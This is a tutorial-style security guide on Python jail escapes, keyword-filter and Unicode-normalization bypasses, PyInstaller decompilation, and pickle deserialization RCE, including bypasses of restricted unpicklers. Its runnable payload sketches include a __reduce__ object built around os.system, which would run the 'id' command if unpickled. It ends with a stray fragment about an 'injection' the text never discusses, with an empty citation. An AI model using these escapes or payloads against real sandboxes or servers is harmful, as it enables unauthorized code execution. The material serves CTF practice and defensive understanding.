Python
Some tricks specific to the Python language
If you find yourself in some sandbox, jail, or otherwise restricted environment there are a lot of tricks to get out of it.
Using decorators and defined lambda functions, you can execute any code without using ( or ) characters. Simply defining this class will execute the code in the string:
From Python 3.9 onward, you can even get the same code as short as this:
Note: In the string, you can encode any characters the filter doesn't accept by using \x hex escapes.
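A minimal sketch of the decorator variant, assuming exec is reachable by name. RESULT, code and Trigger are placeholder names, and the executed string is a harmless stand-in for a real payload. The parentheses of the call only exist as \x28 and \x29 escapes inside the string:

```python
RESULT = []

# A lambda that ignores its argument and returns the code to run.
# The escapes \x28 and \x29 decode to the two parenthesis characters.
code = lambda _: "RESULT.append\x281337\x29"

# Decorators apply bottom-up: code receives the class and returns the string,
# then exec receives that string and runs it.
@exec
@code
class Trigger:
    pass
```

After the class statement, RESULT holds the appended value and Trigger is bound to the return value of exec, which is None.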
And another completely different way using method overriding, which can even be put on a single line:
The above method works because we overwrite the regular addition operator for the exec() function object. In most built-in functions, this is not allowed and you will get a "can't set attributes of built-in/extension" error. But not all built-in functions are protected like this, and a few classes exist that still allow you to overwrite their methods. You can find them all with this snippet:
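The original snippet is not reproduced here, so the following is only a sketch of one way to search. It assumes that a type allows method overriding exactly when a harmless probe attribute can be set on it; the function name and the _probe attribute are made up for illustration:

```python
import builtins

def overridable_builtins():
    """Return names of built-ins whose type accepts new attributes."""
    names = []
    for name, obj in vars(builtins).items():
        cls = type(obj)
        try:
            # Protected (immutable) types raise TypeError on assignment.
            cls._probe = None
            del cls._probe
        except (TypeError, AttributeError):
            continue
        names.append(name)
    return names

print(overridable_builtins())
```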
It will print all the possible functions that allow method overriding:
" quotes
You can create arbitrary strings without using a " or ' character by using the chr() function, which takes a character's code point (its ASCII number for plain characters):
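As a small sketch, the helper below (to_chr_expression is an illustrative name) turns any string into such a quote-free expression by converting each character to its decimal code point:

```python
def to_chr_expression(text):
    """Build a quote-free expression that evaluates to `text`."""
    return "+".join(f"chr({ord(char)})" for char in text)

expression = to_chr_expression("id")
print(expression)  # chr(105)+chr(100)
```

Evaluating the printed expression in the target gives back the original string.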
You can generate this code by converting every character to decimal:
" quotes or () parentheses
A more complicated way can be used to get strings without quotes or parentheses: index built-in strings at specific offsets and combine the characters into your target string. Not all printable characters can be made in this way, but most of them can (all except '\x0c', '\t', '#', '\x0b', '\r', '?').
The most useful string attributes here are .__doc__ and .name; for example, quit.name[1] would give you 'u'. A script can find all of these, but keep in mind that the strings might differ per Python version or context.
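A rough sketch of such a script, limited to the .__doc__ strings of public built-ins. The function name is illustrative, and the offsets it finds only hold for the interpreter it runs on:

```python
import builtins

def find_char_sources(wanted):
    """Map each wanted character to an expression like len.__doc__[7]."""
    sources = {}
    for name, obj in vars(builtins).items():
        doc = getattr(obj, "__doc__", None)
        # Skip private names, which may resolve differently in the target.
        if name.startswith("_") or not isinstance(doc, str):
            continue
        for index, char in enumerate(doc):
            if char in wanted and char not in sources:
                sources[char] = f"{name}.__doc__[{index}]"
    return sources

sources = find_char_sources("id")
payload = "+".join(sources[char] for char in "id")
print(payload)
```

The resulting payload contains only names, dots, square brackets, digits and plus signs.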
Some tricks to bypass specific dangerous-sounding words being blacklisted.
license()
If you can set the ._Printer__filenames attribute on the built-in license() function, you can change the files it reads the license text from. When you call license() afterward, it reads the overwritten files instead and prints their contents to STDOUT.
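A sketch of the idea that avoids touching the real license object: it builds a fresh instance of _sitebuiltins._Printer, the class behind license() in CPython, and points it at a temporary file standing in for a sensitive one. In a real jail you would set the attribute on license itself:

```python
import contextlib
import io
import os
import tempfile
from _sitebuiltins import _Printer  # class behind the built-in license()

# Stand-in for a sensitive file on the target.
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as handle:
    handle.write("secret file contents\n")

printer = _Printer("license", "fallback text")  # stand-in for license
printer._Printer__filenames = [handle.name]     # name-mangled private attribute

output = io.StringIO()
with contextlib.redirect_stdout(output):
    printer()  # prints the file instead of the license text

os.unlink(handle.name)
print(output.getvalue())
```

Short files are printed in one go; longer ones are paged and wait for input between pages.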
If the "system" keyword is blacklisted, for example, but you still want to call that function to run shell commands, you can try to access it using a string like "sys"+"tem", which technically doesn't include "system" when the input is checked. The parts are only combined into the required string during execution.
To access a function in this way, you cannot index the os module directly. For these dictionary accesses, you need a real dictionary, not a module object. Luckily, modules have attributes that give such a dictionary interface, like .__dict__. If this is also blacklisted, there may be other creative ways of accessing the same function.
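A short sketch of the lookup. The variable names are illustrative, and the function is only looked up here, not called:

```python
import os

# The blocked word never appears literally; it is assembled at runtime.
name = "sys" + "tem"

# Modules are not subscriptable, but their __dict__ is a regular dictionary.
function = os.__dict__[name]

# vars() and getattr() reach the same object if __dict__ is filtered too.
same_via_vars = vars(os)[name]
same_via_getattr = getattr(os, name)
print(function)
```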
Python normalizes Unicode characters for names, so they can be used if the check does not do this normalization. You can use Unicode characters to replace names that would normally be blocked. For example, the following payload does not contain the string "open" or "read":
Instead, it uses the 'Mathematical Sans-Serif Italic' (U+1D608...) characters which will normalize to ASCII letters when Python is executed (notice the slanted characters). You can create arbitrary payloads with a script like the following:
If a shorter payload (fewer bytes) is needed, you can mix and match these Unicode characters in your payload. These Unicode characters take up 4 bytes each, but you will likely only need one in your blacklisted word to bypass it, requiring the penalty once. For example, with only the first character encoded:
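A minimal sketch of a generator for such payloads, covering both the fully converted and the first-letter-only variants. The function name italicize is made up; the offsets assume the Mathematical Sans-Serif Italic capitals start at U+1D608 and the small letters at U+1D622:

```python
def italicize(name, only_first=False):
    """Swap ASCII letters for Mathematical Sans-Serif Italic look-alikes."""
    result = []
    for index, char in enumerate(name):
        if only_first and index > 0:
            result.append(char)
        elif "A" <= char <= "Z":
            result.append(chr(0x1D608 + ord(char) - ord("A")))
        elif "a" <= char <= "z":
            result.append(chr(0x1D622 + ord(char) - ord("a")))
        else:
            result.append(char)
    return "".join(result)

payload = italicize("len") + "([1, 2, 3])"
print(eval(payload))  # 3

# Byte cost of the full conversion versus only the first letter.
print(len(italicize("open").encode()), len(italicize("open", only_first=True).encode()))  # 16 7
```

Only identifiers are normalized this way; the contents of string literals are left untouched.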
See this site for a table of all Unicode transformations, as this trick is far from the only one. Look for "Normalization NFKC", as Python uses it when resolving identifiers such as function names.
When your payload is stored as a file and run, instead of just being evaluated, it is interpreted as a module. This small difference adds a possible trick using magic comments that define an encoding for the rest of the file. A list of encodings can be found here, which includes odd ones like unicode_escape, raw_unicode_escape or utf_7. (read writeup)
These can be abused when a checker first parses your input into an AST, because comments are ignored while parsing and the checker assumes UTF-8. With such an encoding, we can hide a newline after a comment to insert more code, while in UTF-8 the same bytes are seen as part of the comment and ignored when building the AST.
Take the following example:
This executes the id shell command when run, while it looks like it only defines a function:
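The effect can be sketched without writing a file, under the assumption that compiling raw bytes honours the coding line the same way running a file does. The hidden statement here is a harmless assignment instead of a shell command, and SOURCE is a hypothetical file body using utf_7, where +AAo- decodes to a newline:

```python
import ast

# Hypothetical payload file contents.
SOURCE = (
    b"# coding: utf_7\n"
    b"def harmless():\n"
    b"    return 1  # +AAo-HIDDEN = 1337\n"
)

# A checker that decodes the file as UTF-8 sees a function and a comment.
tree = ast.parse(SOURCE.decode("utf-8"))
seen = [type(node).__name__ for node in tree.body]

# Compiling the raw bytes applies the declared encoding first.
namespace = {}
exec(compile(SOURCE, "payload.py", "exec"), namespace)

print(seen, namespace.get("HIDDEN"))
```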
Sometimes you can abuse the environment that is sandboxing or evaluating your input by altering it with your code. If there is a blocked list, for example, you may be able to overwrite it with an empty list to disable the filter for your next attempt. You can get creative with whatever variables you can alter to get an exploitable effect.
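As an illustration, here is a deliberately naive, hypothetical jail whose filter list lives in the same namespace the payload runs in. The names env, blocked and jail are invented for this sketch:

```python
# Hypothetical jail state: the filter is reachable from the payload.
env = {"blocked": ["import", "open"]}

def jail(code):
    """Run code unless it contains a blocked word."""
    if any(word in code for word in env["blocked"]):
        return "blocked"
    exec(code, env)
    return "ok"

print(jail("import os"))        # blocked
print(jail("blocked.clear()"))  # ok
print(jail("import os"))        # ok
```

The second input empties the list in place, so the third attempt passes a filter that no longer checks anything.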
When it is possible to overwrite a function that will be called, a simple way out is to call the help() function. This provides an interactive shell where you can get help pages about Python objects. When the content is sufficiently large, you will be put into the less pager where you can scroll around, but more importantly, escape!
Note that it gives an error when you provide a string that is not a Python object, like help("anything") instead of help("str").
PyInstaller can create executable and shareable files from Python scripts, like Windows .exe files or Linux ELF files. It can also be used for malware, where an attacker writes a malicious Python script and uses PyInstaller to compile it into an executable they can plant somewhere. That is why reversing such a file can be very useful, and it turns out the full source code can be decompiled almost flawlessly from such a file.
First, you will want to extract the data from the PyInstaller executable. This can be done very easily using pyinstxtractor.
As the above repository shows in the example, the script generates a [name]_extracted folder with .pyc files. Among these files will be all the modules, and the main script. You will often have to guess what file is the main script, but the tool will also give "Possible entry points".
These .pyc files are the compiled Python bytecode, which is not human-readable. To fix that, we can use uncompyle6 or pycdc to decompile this bytecode into something close to the original source code.
Then you can look at the created .py file to review all the source code.
This idea came from a combination of this writeup about PyArmor, and my own experiments.
If the code after decompiling still looks unreadable, it may be protected with an obfuscator or "packer". These try to make it harder to deobfuscate, but with some tricks, we can perform dynamic analysis to recover the code and steps after it has been decrypted at runtime.
You should be able to run the example.pyc file with python like you normally would, because it's simply the already-compiled version. If you get any errors involving missing .so files, a simple solution is to just run it with LD_LIBRARY_PATH=. as they should be in the _extracted directory.
ImportError: libffi.so.6: cannot open shared object file: No such file or directory
Note the specific Python version here, as the magic number might not line up with your default version. Use apt to install that version, and possibly its -distutils package too when using pip.
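To check whether a .pyc was built for the interpreter you are about to run it with, a small sketch like the following compares the first four bytes of the file with the running interpreter's magic number. The function name is illustrative:

```python
import importlib.util

def matches_interpreter(pyc_path):
    """Compare the 4-byte magic of a .pyc with the running interpreter's."""
    with open(pyc_path, "rb") as handle:
        magic = handle.read(4)
    return magic == importlib.util.MAGIC_NUMBER
```

Calling matches_interpreter("example.pyc") under each installed Python version shows which one the file was compiled for.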
After this, there still might be errors involving Python imports which would normally be included in the binary. To get these back as .pyc files, look in the PYZ-00.pyz_extracted folder that was also created by pyinstxtractor. A simple solution is to copy these files next to your main file:
This should get the binary running like normal, with the big change being that it is in its unpacked form, where we can see all the libraries. This allows us to hijack libraries by changing their code. After doing so, the mysterious main code will load our library, from which we can extract information about the calling code at runtime!
Take any library that you know the code imports, which may be one from the ImportErrors we got above. We will back up the original code and replace it with our own:
It works! Now for the final step, we can use the inspect module to view the call stack and find out what code called us. This code object can be disassembled to understand the bytecode:
Here, choose a frame that makes sense and looks like it should be the main code. In my case, the last [-1] frame was still the obfuscated code, but the frame before that [-2] was decrypted.
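A sketch of what the replacement library could contain. dump_callers is an illustrative name, and which index holds the interesting frame depends on the target:

```python
import dis
import inspect

def dump_callers():
    """Print every frame on the call stack and return their code objects."""
    codes = []
    # Index 0 is this function; the last entry is the outermost caller.
    for index, info in enumerate(inspect.stack(0)):
        print(index, info.filename, info.function)
        codes.append(info.frame.f_code)
    return codes

codes = dump_callers()
dis.dis(codes[-1])  # try other indexes such as [-2] as well
```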
To go one step further, we can even forge our own .pyc file from the code object, allowing decompilers like uncompyle6 or pycdc to make readable source code from it:
Note: This trick did not work in my case, as I received strange AssertionErrors in format_RAISE_VARARGS_older, but it may work for you.
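One way to forge such a file is sketched below, assuming the Python 3.7+ layout of a 16-byte header (magic number, flags, modification time, source size) followed by the marshalled code object. The magic number is taken from the running interpreter, so run this with the same Python version as the target. code_to_pyc and the sample code are illustrative:

```python
import importlib.util
import marshal
import os
import tempfile

def code_to_pyc(code, path):
    """Write a code object to `path` with a minimal .pyc header."""
    header = importlib.util.MAGIC_NUMBER  # 4 bytes, tied to this interpreter
    header += b"\x00" * 12                # flags, mtime and source size, zeroed
    with open(path, "wb") as handle:
        handle.write(header + marshal.dumps(code))

# Stand-in for a code object taken from a stack frame.
recovered = compile("answer = 6 * 7", "<recovered>", "exec")
path = os.path.join(tempfile.mkdtemp(), "recovered.pyc")
code_to_pyc(recovered, path)
print(path)
```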
co_code bytecode
All functions, classes, modules etc. in Python have a __code__ attribute, which holds information about its code. This is not directly source code, but bytecode, being the optimized form that the interpreter sees without having to deal with different whitespace or variable names.
Using dis.dis() on such an object, the disassembled bytecode is printed in a readable form. The <class 'code'> has several parts, one of which is the raw bytecode in co_code. This can also be disassembled with the same function, but it won't contain referenced variable names or constants. These are in co_names + co_varnames and co_consts respectively, and can be combined into the final readable code Python understands. Look at this example:
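A small sketch with a made-up function shows where each piece ends up:

```python
import dis

def greet(name):
    message = "Hello, " + name
    print(message)
    return 1337

code = greet.__code__
print(code.co_code)      # raw bytecode, without names or constants
print(code.co_names)     # global and attribute names: ('print',)
print(code.co_varnames)  # arguments and locals: ('name', 'message')
print(code.co_consts)    # literal constants, including 'Hello, ' and 1337
dis.dis(code)            # readable listing that combines all of the above
```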
From reading these attributes, we can recreate the code object from scratch and dump it into a .pyc file like before. Then tools like uncompyle6 can decompile the bytecode back into source:
Pickle is a Python module used for serializing Python objects into raw bytes. This way they can be sent over the network, or saved in a file, and then later be deserialized to get back the original Python object.
However, there is one issue: when this deserialized data can come from the user, they can create arbitrary Python objects. This results in a classic Insecure Deserialization vulnerability, leading to Remote Code Execution.
This vulnerability has a special place in my heart, as I found it as an unintentional bug on a school assignment, and spent a lot of time and effort to try and get the most out of it. In the end, it resulted in RCE on the server, as well as on all clients that connected because the template script given was also vulnerable. You can read the whole story and learn a lot about pickle deserialization here:
The basics are that you can create a Python object that executes a system command when pickle turns it back into an object. This is done with the special __reduce__() method:
This method is called when the object is serialized, and its return value describes how to rebuild the object: a function, and the arguments to call it with during deserialization. Whatever that call returns is what the object turns into. We can provide the function os.system after importing it, and as the first argument give it any command we want to run.
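A minimal sketch of such an object. The Payload class is illustrative; the dangerous bytes are only built here, never loaded, and the same mechanism is demonstrated with a harmless call to int instead:

```python
import os
import pickle

class Payload:
    """Pickles as 'call func(*args) when loaded'."""

    def __init__(self, func, *args):
        self.func = func
        self.args = args

    def __reduce__(self):
        # pickle stores this pair; the unpickler later calls func(*args).
        return self.func, self.args

# Building the bytes runs nothing; pickle.loads(malicious) would run `id`.
malicious = pickle.dumps(Payload(os.system, "id"))

# Harmless demonstration of the same mechanism.
result = pickle.loads(pickle.dumps(Payload(int, "1337")))
print(result)  # 1337
```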
Tip: Using exec or eval instead of os.system can allow for more control over the actions your payload takes, as you can execute arbitrary Python code at the time of deserialization. Think of things like raise to return a readable exception message.
The above is often enough, but in rare cases, you might have some restrictions on what data you can send. Maybe you need to bypass some filter or a length restriction.
Pickle has evolved over time, with new protocols for better serializing of objects. Luckily, this protocol can be chosen by whoever creates the data, and the server deserializing it will simply recognize the protocol and switch accordingly.
This opens up the opportunity for a few different formats that might help in whatever filter you are trying to get through.
Using the pickletools.dis(data) function, we can disassemble the serialized data to better understand what each byte is doing:
This PROTO value represents the protocol used, and in the pickle.dumps method we can pass the protocol= keyword argument to choose it. This is a number between 0 and 5. Across these protocols, the payload can look very different:
In most simple cases, protocol=1 is the shortest.
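To compare the protocols yourself, a sketch like this prints the size and bytes for each one. The Payload class uses a harmless int call as a stand-in for os.system, so exact sizes will differ from a real payload:

```python
import pickle
import pickletools

class Payload:
    def __reduce__(self):
        return int, ("1337",)  # harmless stand-in for (os.system, ("id",))

sizes = {}
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
    data = pickle.dumps(Payload(), protocol=protocol)
    sizes[protocol] = len(data)
    print(protocol, len(data), data)

# Disassemble one of them to see the PROTO opcode and the rest.
pickletools.dis(pickle.dumps(Payload(), protocol=2))
```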
As you might have noticed above, the os.system function turned into 'posix system' in the serialized data. This is what automatically happens when you serialize data using pickle.dumps, but it turns out there are actually multiple ways to represent this function.
I expected to see os instead of posix, so I tried simply replacing posix with os. This turned out to actually work! The deserializer will happily decode this to the correct function and still achieve RCE. By simply replacing this text in the serialized data, you can get rid of 3 characters:
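The replacement can be sketched as follows, using os.getcwd as a harmless stand-in for os.system. It relies on protocol 1 storing the module and name as newline-terminated text, so no length fields need fixing:

```python
import os
import pickle

class Payload:
    def __reduce__(self):
        return os.getcwd, ()  # harmless stand-in for (os.system, ("id",))

data = pickle.dumps(Payload(), protocol=1)

# The GLOBAL opcode is the letter c followed by "module\nname\n".
module = os.getcwd.__module__.encode()  # b"posix" on Linux
shorter = data.replace(b"c" + module + b"\n", b"cos\n", 1)

print(data, shorter)
print(pickle.loads(shorter))
```

Newer protocols store these strings with a length prefix, so a plain text replacement like this would corrupt them.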
Finally, after having the shortest possible pickle data, you need a short command to receive a shell and further explore the target. In the writeup linked above, I discovered my own method to slowly write a full payload to a file and execute it, using many commands of fewer than 12 bytes each. This was enough to bypass the 40-byte packet limit of that situation.
As explained in the documentation, a filter can be added to the deserialization process that restricts the objects that can be imported. Importing is normally possible through the GLOBAL opcode, which takes a module and a class to load. This allows it to use methods from other modules and classes while deserializing, which is how it is able to deserialize any object.
As we have seen above, it allows an attacker to import dangerous modules such as os to run commands, or builtins like exec and eval to execute arbitrary Python code. The filter can define its own logic for importing modules and classes with an extension like the following:
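The original filter is not reproduced here. The sketch below follows the find_class pattern from the pickle documentation, with an allowlist and denylist that are assumptions based on the modules discussed in the rest of this section:

```python
import io
import pickle

ALLOWED_MODULES = {"random", "builtins", "collections"}  # assumed allowlist
BLOCKED_NAMES = {"exec", "eval"}                         # assumed denylist

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every global the pickle data wants to import.
        if module in ALLOWED_MODULES and name not in BLOCKED_NAMES:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data):
    """Like pickle.loads(), but with the filter applied."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```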
The above rules only allow classes from the random module to be imported, and some dangerous built-ins are blocked. While it may seem safe at first, it turns out that there are still a lot of possibilities to bypass a configuration like this. Great research into this has been done by @splitline, who ended up creating a tool that compiles Python-like code into serialized pickle data, because the opcodes are quite powerful and allow defining some simple logic (also check out the talk):
The most important pieces of syntax that it can turn into pickle are the following:
Define variables with common types like string, number, list, tuple or dict
Attribute assignment like dict_['x'] = 1337
Function calls like f(arg1, arg2)
Import modules using from module import something syntax
Manually import more complex objects using GLOBAL("module", "path.to.something")
The next section will use the Pickora syntax to easily create pickle data, which can be compiled like so:
We will look at the example filter from above to bypass it in various general ways.
Firstly, while the allowed random module does not contain directly dangerous functions, it imports some modules, like import os as _os. This is a property path that we can include in the GLOBAL opcode as the name of the class, separated by . dots. This way we can access the os module like before, but through the random module to bypass the filter:
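Without Pickora, the same idea can be sketched with hand-written opcodes in plain Python. The filter class below is a simplified stand-in that only allows random, and _os.getcwd is used as a harmless stand-in for _os.system:

```python
import io
import os
import pickle

class RandomOnlyUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module != "random":
            raise pickle.UnpicklingError("forbidden module")
        return super().find_class(module, name)

payload = (
    b"\x80\x04"               # PROTO 4: allows dotted names in GLOBAL
    b"crandom\n_os.getcwd\n"  # GLOBAL random, _os.getcwd
    b")R."                    # EMPTY_TUPLE, REDUCE (call it), STOP
)
result = RandomOnlyUnpickler(io.BytesIO(payload)).load()
print(result)
```

The filter only ever sees the module name random, yet the call lands in the os module.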
Secondly, there is another allowed module named builtins. exec and eval are blocked, but more dangerous functions exist in the module, like __import__ to import os again. However, we cannot just access the .system function on it to run a command, as this is not possible in pickle opcodes. Instead, we can call the builtins.getattr function, as it is also not blocked, with the property we want to access on the os module:
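As a plain-Python sketch with hand-written opcodes, again using getcwd as a harmless stand-in for system. Only builtins.getattr and builtins.__import__ are requested as globals:

```python
import os
import pickle

payload = (
    b"cbuiltins\ngetattr\n"     # GLOBAL builtins.getattr
    b"("                        # MARK: start of getattr's arguments
    b"cbuiltins\n__import__\n"  # GLOBAL builtins.__import__
    b"(Vos\ntR"                 # __import__("os") -> the os module
    b"Vgetcwd\n"                # attribute name, stand-in for "system"
    b"tR"                       # getattr(os, "getcwd")
    b")R."                      # call it with no arguments, then STOP
)
result = pickle.loads(payload)
print(result)
```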
Thirdly, the seemingly insignificant collections module is also allowed to be imported from. One trick we can perform on any module is importing its .__builtins__ attribute and calling __getitem__ on it to recover a builtin like eval:
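A hand-written sketch of this path, with a harmless arithmetic expression as the evaluated code. It assumes collections.__builtins__ is the builtins dictionary, as it normally is for imported modules in CPython:

```python
import pickle

payload = (
    b"\x80\x04"                                  # PROTO 4 for dotted names
    b"ccollections\n__builtins__.__getitem__\n"  # bound dict.__getitem__
    b"(Veval\ntR"                                # __getitem__("eval") -> eval
    b"(V6 * 7\ntR."                              # eval("6 * 7"), then STOP
)
result = pickle.loads(payload)
print(result)  # 42
```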
Lastly, if we weren't allowed to use the builtins module or the __builtins__ attribute, we can still use any module to recover the builtins. The clever trick is to temporarily save a value as an attribute on the module using __setattr__, to be able to access it later with another GLOBAL opcode. We can then import the __getitem__ method on such a saved object and call it to access any dictionary key, which normally wouldn't be possible in pickle opcodes. This combined with __builtins__ allows us to get back to eval again:
Note: If you are able to import any function, you can significantly reduce the complexity of this bypass by accessing its globals and the .get() method, as explained in this writeup.
You might find a serialized piece of pickle data, but without source code, it may be difficult to understand what it exactly means. There are a few plaintext strings inside the serialized data that can give an idea of what it is about. To get a full understanding of everything some more analysis is required, but luckily there exist tools that help with this.
The pickletools library contains useful functions for analyzing pickled data and can disassemble the opcodes to get a better understanding of the binary data:
This disassembly works by pushing to and popping from a stack. This is clearer with a nested expression like (1, [2, 3]):
Here, the integer 1 is pushed on the stack, then an empty list is pushed too. A "markobject" is pushed, followed by the numbers 2 and 3, and at the end the list is extended by everything above the mark. This leaves the integer 1 and the list on top of the stack, which TUPLE2 turns into a tuple from the 2 topmost stack items.
A common opcode is MEMOIZE, which stores the stack top in a special place for reuse later on. It can then be referenced further on in the data so the value does not have to be repeated.
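The walk-through above can be reproduced with a couple of lines. Protocol 4 is chosen explicitly here so that the opcodes match the ones named in the text:

```python
import pickle
import pickletools

data = pickle.dumps((1, [2, 3]), protocol=4)
pickletools.dis(data)
```

The listing shows one opcode per line with its byte offset, so each step of the stack manipulation can be followed in order.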
Warning: As shown above, deserializing any pickle payload can lead to Arbitrary Code Execution, so be careful what you deserialize while reverse engineering! If you have any reason for suspicion, try it in a safe environment like a VM first.
While static analysis can give a decent idea, you can see a lot quickly when simply running the code in the pickled data. To get only the result of a deserialization, run:
You can play with the result if it is more complex in a Python console:
Some pickled data requires custom classes to be defined, which it sets properties on or initializes in other ways. These need to be defined in the context before deserializing, or it will throw an error with the missing class name. If these are unknown, try doing more static analysis.
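One way to find the names of such classes without unpickling anything is to walk the opcodes with pickletools.genops and collect every string argument. This is only a sketch; referenced_names is an illustrative helper, and the sample data is a harmless class reference:

```python
import collections
import pickle
import pickletools

def referenced_names(data):
    """List GLOBAL targets and string constants without unpickling."""
    found = []
    for opcode, arg, _position in pickletools.genops(data):
        if isinstance(arg, str):
            found.append((opcode.name, arg))
    return found

sample = pickle.dumps(collections.OrderedDict, protocol=3)
print(referenced_names(sample))
```

With protocol 4 and later, the module and class names show up as two separate string opcodes followed by STACK_GLOBAL instead of a single GLOBAL entry.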
To view more of the steps involved, try following the load() call in a debugger like VSCode, which will decompile some pieces of code visually and show intermediate variables. If a pickle object requires more steps to be created, this can give a great idea of those steps.
If you find your mystery object has functions defined (common with machine learning models), the inspect.getsource() function may be able to recreate the source code for the function in question. The more low-level dis.dis() function can give you disassembled bytecode instead.
However, in the meantime, I found that this problem has been explored before. Orange Tsai made a challenge where you had to achieve full RCE commands of only 4 bytes each. The solution to this challenge is explained in . This can be applied just as easily to this injection.